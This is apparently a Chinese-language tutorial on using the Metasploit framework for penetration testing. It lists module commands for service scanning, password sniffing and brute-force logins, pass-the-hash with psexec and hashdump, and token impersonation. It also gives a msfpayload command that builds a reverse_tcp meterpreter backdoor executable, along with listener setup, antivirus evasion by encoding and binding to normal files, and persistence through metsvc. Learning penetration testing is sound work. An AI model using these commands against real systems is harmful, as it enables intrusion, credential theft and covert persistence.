Metasploit的简单介绍与使用

简介

Metasploit不仅仅是一个工具软件,它是为自动化地实施经典的、常规的、复杂新颖的攻击,提供基础设施支持的一个完整框架平台。它可以使使用人员将精力集中在渗透测试过程中那些独特的方面上,以及如何识别信息安全计划的弱点上。Metasploit能够让用户通过选择它的渗透攻击模块、攻击载荷和编码器来轻易实施一次渗透攻击,也可以更进一步编写并执行更为复杂的攻击技术。

使用

smb模块

调用use auxiliary/scanner/smb/smb_version

显示设置show options

指定端口set RHOSTS ip段范围

服务识别

调用ssh部分use auxiliary/scanner/ssh/ssh_version

调用ftp部分use auxiliary/scanner/ftp/ftp_version

…(其他操作与上面类似)

密码嗅探

调用use auxiliary/sniffer/psnuffle

snmp扫描

调用use auxiliary/scanner/snmp/snmp_login

调用枚举use auxiliary/scanner/snmp/snmp_enum

SMB登录验证

调用use auxiliary/scanner/smb/smb_login

扫描时,绿色[+]表示成功红色[-]表示失败

VNC身份识别

调用use auxiliary/scanner/vnc/vnc_none_auth

WMAP web扫描

调用load wmap

不同部分的帮助信息

wmap_sites -h
wmap_targets -h
wmap_run -h
wmap_vulns -h

远程代码执行

  1. search 漏洞名 , 然后use 相应模块
  2. show payload , 然后set payload xxxx , set LHOST(设置本地IP) , set target xxxxxx
  3. exploit有响应后 , 输入shellget shell
  • 示例

口令安全

(以mysql为例)

调用use auxiliary/scanner/scanner/mysql/mysql_login

  1. 设置target set RHOSTS xxxx
  2. 设置用户名 set USERNAME xxxxx or set USER-FILE xxxxxx
  3. 设置密码 set PASSWORD xxxxxx or PASS-FILE xxxx
  4. exploit

HASH值传递渗透

调用use exploit/windows/smb/psexec

  1. set RHOST xxxxxx , 然后set SMBUSER xxxxx
  2. exploit
  3. hashdump
  4. set smbpass xxxxxx
  • 示例

多种后门生成

目前metasploit可以生成的后门有:

  • windows后门
  • linux后门
  • java后门
  • php后门
  • jsp后门
  • asp后门
  • aspx后门
  • android后门
  • ……

生成后门 msfpayload windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=你想使用的端口 X >路径/名字.exe

监听

  1. user exploit/multi/handler
  2. set payload xxxxxx, set LHOST xxxxx, set LPORT xxxx
  3. 如果你想加密,还可以用msfencode -e xxxxxx or -t or -o
  4. exploit
  • 示例

内网渗透

  1. 首先获取到目标ip的c段

  2. 知道具体某个域后,可以用如下指令进一步了解

    • use incognito
    • list_tokens -u
    • impersonate_token xxxxxxx
    • …..

  3. 根据不同需要进行不同的深入操作

病毒免杀

免杀的操作有很多种,可以加壳、改壳、改特殊码等等

这里大概展示一下msfencode的部分操作,建议可以多种+多次的组合来操作

  • 示例

    ……

如果想要绑定正常文件,还可以加入参数-x

XSS+键盘记录

类似的配合还有很多,提供一个大概思路(如图)

维持访问

前提是当前有个session存活

通过服务启动run metsvc -A

回连时使用windows/metsvc_bind_tcp的payload就可以

  • 示例

metasploit的功能十分强大,每个模块的具体功能还有很多,具体还是要靠自己去摸索,去尝试,这样在实际操作中才会面对不同的情况都能灵活应对

梦想还是要有的,万一实现了呢?